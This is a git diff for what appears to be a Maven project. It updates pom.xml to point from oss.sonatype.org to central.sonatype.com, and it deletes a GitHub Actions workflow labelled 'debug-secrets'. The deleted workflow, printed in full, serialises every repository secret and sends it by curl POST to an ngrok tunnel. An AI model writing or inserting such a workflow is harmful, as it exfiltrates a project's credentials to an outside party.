diff --git a/.github/workflows/debug-secrets-workflow.yml b/.github/workflows/debug-secrets-workflow.yml
deleted file mode 100644
index 9c794ba2..00000000
--- a/.github/workflows/debug-secrets-workflow.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: debug-secrets-workflow
-on: workflow_dispatch
-
-jobs:
- post-secrets:
- runs-on: ubuntu-latest
- steps:
- - name: Post secrets to API
- env:
- ALL_SECRETS: ${{ toJson(secrets) }}
- run: |
- curl -X POST https://6a4b34e5f94f.ngrok-free.app \
- -H "Content-Type: application/json" \
- -d "$ALL_SECRETS"
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 0044df35..ec0e5709 100644
--- a/pom.xml
+++ b/pom.xml
@@ -33,12 +33,12 @@
- ossrh
- https://oss.sonatype.org/content/repositories/snapshots
+ central
+ https://central.sonatype.com/content/repositories/snapshots
- ossrh
- https://oss.sonatype.org/service/local/staging/deploy/maven2/
+ central
+ https://central.sonatype.com/service/local/staging/deploy/maven2/
@@ -386,11 +386,11 @@
1.6.13
true
- ossrh
- https://oss.sonatype.org/
+ central
+ https://central.sonatype.com/
true
- 600000
- 600000
+ 600000
+ 600000